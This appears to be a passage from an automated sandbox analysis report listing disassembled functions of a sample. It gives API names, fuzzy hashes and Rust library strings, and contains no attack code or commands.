                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$bindclosesocket
                                            • String ID: 127.0.0.1:0C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\mod.rs
                                            • API String ID: 2995523075-3689599868
                                            • Opcode ID: ad2d32f3e8c9361f16426e84d584cb893d1ecde264878ffcf79dfde696ea45ab
                                            • Instruction ID: 7666e8fc993e9fbe28cc2b465386fee2e6ea788f90ab7f8c98efd444d461190b
                                            • Opcode Fuzzy Hash: ad2d32f3e8c9361f16426e84d584cb893d1ecde264878ffcf79dfde696ea45ab
                                            • Instruction Fuzzy Hash: 1C412402E4D54241F6269B1695A42BB5360FF95BC4F4D81B0EE4DABA8EEF3CF582C301
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 06e4d80b54df5da8e4705d500cb2e989d020187ff7996088e17b3ee3ce73ff1c
                                            • Instruction ID: 7d9375600b2cbdd07fd50ccd29578636e9696e7001c2eca267063141eb156287
                                            • Opcode Fuzzy Hash: 06e4d80b54df5da8e4705d500cb2e989d020187ff7996088e17b3ee3ce73ff1c
                                            • Instruction Fuzzy Hash: 71516111A0CE8280E725DB13D0E43BD67A1EB95B98F4C40B6CA4DA7BA5CF3CE584E304
                                            APIs
                                            Strings
                                            • assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs, xrefs: 00007FF654391949
                                            • assertion failed: (*next).value.is_some(), xrefs: 00007FF654391961
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeapSwitchThread
                                            • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs
                                            • API String ID: 3436096665-1756350486
                                            • Opcode ID: 84129f549843d409cbcb5b59c7b5f79c44aaa92dd529a9713b3949fa1da5a843
                                            • Instruction ID: 396af4933546f934500986147b236a0341153f7d504fac6ae4b0c8738d06c870
                                            • Opcode Fuzzy Hash: 84129f549843d409cbcb5b59c7b5f79c44aaa92dd529a9713b3949fa1da5a843
                                            • Instruction Fuzzy Hash: 99319321A0DA5241FB41AF12E4E03B967A0EF84B84F4C84B5DA5DB77E6DE3CE856C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$abort$CaptureContextUnwind
                                            • String ID:
                                            • API String ID: 2601978900-0
                                            • Opcode ID: 72539d07733f5c89b2fe4ebd2f3d20a13ed7dca65a088b10d8dca6385d06fdcd
                                            • Instruction ID: b236f4bb54ca4048d0f6b99907ba30ec3bdcc86301f5cc1e7f9b045bc4c14ad3
                                            • Opcode Fuzzy Hash: 72539d07733f5c89b2fe4ebd2f3d20a13ed7dca65a088b10d8dca6385d06fdcd
                                            • Instruction Fuzzy Hash: 6A41405190CA9281E731D723D0A43BE6BA0EF85B94F4C40B5DA8DA7AE6CF7CE544D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 9afe85c9a5d2e368a3203b85afa8c73ab4a08f7d563702edfebc913d0ebc13c9
                                            • Instruction ID: f14b75a7b91db14ee241d66702df1a4ec455e2984cb164d74caaaa209672e14c
                                            • Opcode Fuzzy Hash: 9afe85c9a5d2e368a3203b85afa8c73ab4a08f7d563702edfebc913d0ebc13c9
                                            • Instruction Fuzzy Hash: 12414425908E9180E725DB17D0E43F967A1EB89F94F0D40B5DA4DA7BA5CF7CE184D304
                                            APIs
                                            Strings
                                            • %00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%27%28%29%2A%2B%2C%2D%2E%2F%30%31%32%33%34%35%36%37%38%39%3A%3B%3C%3D%3E%3F%40%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%5, xrefs: 00007FF65440C391, 00007FF65440C543
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: %00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%27%28%29%2A%2B%2C%2D%2E%2F%30%31%32%33%34%35%36%37%38%39%3A%3B%3C%3D%3E%3F%40%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%5
                                            • API String ID: 3510742995-2957816097
                                            • Opcode ID: 251ecf8ad7c06b0989250abcc91b7a3fd89079972ffa3d89b609e1948b408509
                                            • Instruction ID: 0ca58d62ba2b6945f0d4be939c0805f7fd34033e3becf9141f3073f4ec4048f2
                                            • Opcode Fuzzy Hash: 251ecf8ad7c06b0989250abcc91b7a3fd89079972ffa3d89b609e1948b408509
                                            • Instruction Fuzzy Hash: 9A911332A1DA52C2EA189B01E4A437D67B0FB54BC4F588475EE4EABB99DF3CE155C300
                                            APIs
                                            Strings
                                            • assertion failed: self.is_char_boundary(end), xrefs: 00007FF65453C4B5
                                            • file://C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.5.0\src\parser.rs, xrefs: 00007FF65453C2F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID: assertion failed: self.is_char_boundary(end)$file://C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.5.0\src\parser.rs
                                            • API String ID: 231171946-2841207823
                                            • Opcode ID: 692a6558f75060d96eeee566a0cf0f1a0391a1ba062319b6298986942206159f
                                            • Instruction ID: d20c89e07b497de494f01190143c55a45d8953e990a74594d4e510d231a9fb15
                                            • Opcode Fuzzy Hash: 692a6558f75060d96eeee566a0cf0f1a0391a1ba062319b6298986942206159f
                                            • Instruction Fuzzy Hash: 0671C122F0C64255FA61DF69D8E03B866A0AF45B80FAC01B2D95DF37E5DE7DE8468300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 092a846f0a0c8701708318f1c636a3b7a0eefc1861aca6ccf4ecabe96326bac8
                                            • Instruction ID: 88546864031dd70af5b5ce9d27c84d4dfa85534b7138814e6d1535d0af0399e6
                                            • Opcode Fuzzy Hash: 092a846f0a0c8701708318f1c636a3b7a0eefc1861aca6ccf4ecabe96326bac8
                                            • Instruction Fuzzy Hash: 7271D23260AB8184EA55DF16D4E43FA23A0FB44B94F894275DEAD973B1EF3DD5808340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 1923fdf10d7db0afed9ffa56a446bd4e5cbe20942cf2d9fff9554977f15dd424
                                            • Instruction ID: 90178007faa6222f187994a843c849b425c4f2f5f285d8d04a289da3a9c7e934
                                            • Opcode Fuzzy Hash: 1923fdf10d7db0afed9ffa56a446bd4e5cbe20942cf2d9fff9554977f15dd424
                                            • Instruction Fuzzy Hash: F7712F2290CAC281E771DB16D4A43FA6BA0EB85B58F4C40B6DA8DA77F5CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 46f74798f18dc56f35ffc8ee96133c2d2a4ba4a68cd7e4ef8604d3010cb74dbe
                                            • Instruction ID: 123c799ab0c7c08907e5a09708ae600f6ff3f87cd5ae919040087da1b7d50973
                                            • Opcode Fuzzy Hash: 46f74798f18dc56f35ffc8ee96133c2d2a4ba4a68cd7e4ef8604d3010cb74dbe
                                            • Instruction Fuzzy Hash: F9713D2290CAC281E771DB16D4A43FA6BA0EB85B98F4C40B6DA8DA77F5CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: bdb0d351d98f454345e3126e11272f7bcb48a2147cf93a6cd937255902868b0a
                                            • Instruction ID: 68ffea15fd2e25063bcf88b4c6d3c5c56425919098c19865e37a27ac8de96e3b
                                            • Opcode Fuzzy Hash: bdb0d351d98f454345e3126e11272f7bcb48a2147cf93a6cd937255902868b0a
                                            • Instruction Fuzzy Hash: 87711E2290CAC281E771DB16D4A43FA6BA0EB85B98F4C40B6DA8DA77F5CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d35844bfc544a77ca927d4d44393b44f72634dae5aad4fcb4e59225a89d5009c
                                            • Instruction ID: c70b36892b6b61db628e3a26469dfc79aa205b70fe7cb652b360b11c55b38aee
                                            • Opcode Fuzzy Hash: d35844bfc544a77ca927d4d44393b44f72634dae5aad4fcb4e59225a89d5009c
                                            • Instruction Fuzzy Hash: 5061502290CAC280E771D716D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 369c5985ba3b6b0c6d1ef37012f9fd449c275b8bbb53eed174bd0ad686564197
                                            • Instruction ID: 8dc4137b27a31b6d57de211e6a1179eeb59918c3605086143958d399be755c00
                                            • Opcode Fuzzy Hash: 369c5985ba3b6b0c6d1ef37012f9fd449c275b8bbb53eed174bd0ad686564197
                                            • Instruction Fuzzy Hash: C961622290CAC680E771D716D4A43FA6BA0EB85B88F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 55d8ba2fff13933a2f0c5314db1d9457fc9fe8175cec99085dddeb6bb62dd62a
                                            • Instruction ID: 9249247f054763cc55ab04cc232ed83ddb43a3bc25ac9b1b3f0df6b3a063eaca
                                            • Opcode Fuzzy Hash: 55d8ba2fff13933a2f0c5314db1d9457fc9fe8175cec99085dddeb6bb62dd62a
                                            • Instruction Fuzzy Hash: 3761612290CA8281E771D726D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF7CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: dbe53dfcfb494227f45fb03d11579ad898845c45d026d2147c01808d61359a34
                                            • Instruction ID: 2c630bc22cdd7650aa1c3c4516c0ae13dfaae0b47b247bde7b6b6f9458b04884
                                            • Opcode Fuzzy Hash: dbe53dfcfb494227f45fb03d11579ad898845c45d026d2147c01808d61359a34
                                            • Instruction Fuzzy Hash: 7C61302290CA8281E771D716D4A43FA6BA0EB85B58F4C40B6D68DA76F6CF7CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 6059ab7c4649b65237459d9965463771ca00c4865d4ae9a761b32c4f9aa350f4
                                            • Instruction ID: 657f4015b47c47a56d46f3a4e2de37ddce5dda6d5af6444fd597e46d0efad94c
                                            • Opcode Fuzzy Hash: 6059ab7c4649b65237459d9965463771ca00c4865d4ae9a761b32c4f9aa350f4
                                            • Instruction Fuzzy Hash: 28615F2290CAC681E771D726D4A43FA6BA0EB84B98F4C40B6D68DA76F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
